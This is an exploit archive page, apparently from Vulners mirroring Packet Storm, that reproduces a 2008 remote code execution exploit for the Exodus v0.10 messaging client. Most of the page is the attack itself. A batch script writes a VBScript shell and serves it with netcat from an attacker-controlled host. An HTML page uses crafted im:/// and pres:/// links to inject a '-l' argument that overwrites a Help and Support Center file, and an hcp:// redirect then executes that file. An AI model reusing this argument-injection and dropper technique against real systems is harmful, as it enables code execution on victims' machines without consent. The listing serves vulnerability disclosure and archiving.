Lucene search
K

exodus-injection.txt

🗓️ 20 Nov 2008 00:00:00Reported by Nine:Situations:GroupType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Exodus v0.10 remote code execution exploit by Nine:Situations:Group::strawdog, using "-l" argument to overwrite file in Microsoft Help and Support Center folders via netcat and vbscript shell

Code
`<!--  
Exodus v0.10 remote code execution exploit  
by Nine:Situations:Group::strawdog  
  
This uses the "-l" argument to overwrite a file  
inside Microsoft Help and Support Center folders (oh rgod...)  
  
Firstly run netcat in listen mode to drop the vbscript shell  
run this script:  
  
@echo off  
rem dropsh.cmd  
echo ^<SCRIPT LANGUAGE="VBScript"^> > testfile  
echo Dim wshShell >> testfile  
echo Set wshShell = CreateObject("WScript.Shell") >> testfile  
echo wshShell.Run("cmd /c start calc") >> testfile  
echo ^</SCRIPT^> >> testfile  
nc -L -s 192.168.0.1 -p 5222 -vv < testfile  
  
-->  
<html>  
<head>  
<script type="text/javascript">  
<!--  
function doRedirect() {  
location.href = "hcp://system/sysinfo/msinfo.htm";  
}  
function runcalc() {  
window.setTimeout("doRedirect()", 10000);  
}  
//-->  
</script>  
<a href="im:///'%20-l%20C:\WINDOWS\PCHEALTH\HELPCTR\System\sysinfo\msinfo.htm%20-j%[email protected]%20-p%20AAAA%20%00" onClick="runcalc()">click me</a><br>  
<a href="pres:///'%20-l%20C:\WINDOWS\PCHEALTH\HELPCTR\System\sysinfo\msinfo.htm%20-j%[email protected]%20-p%20AAAA%20%00" onClick="runcalc()">click me</a>  
</html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation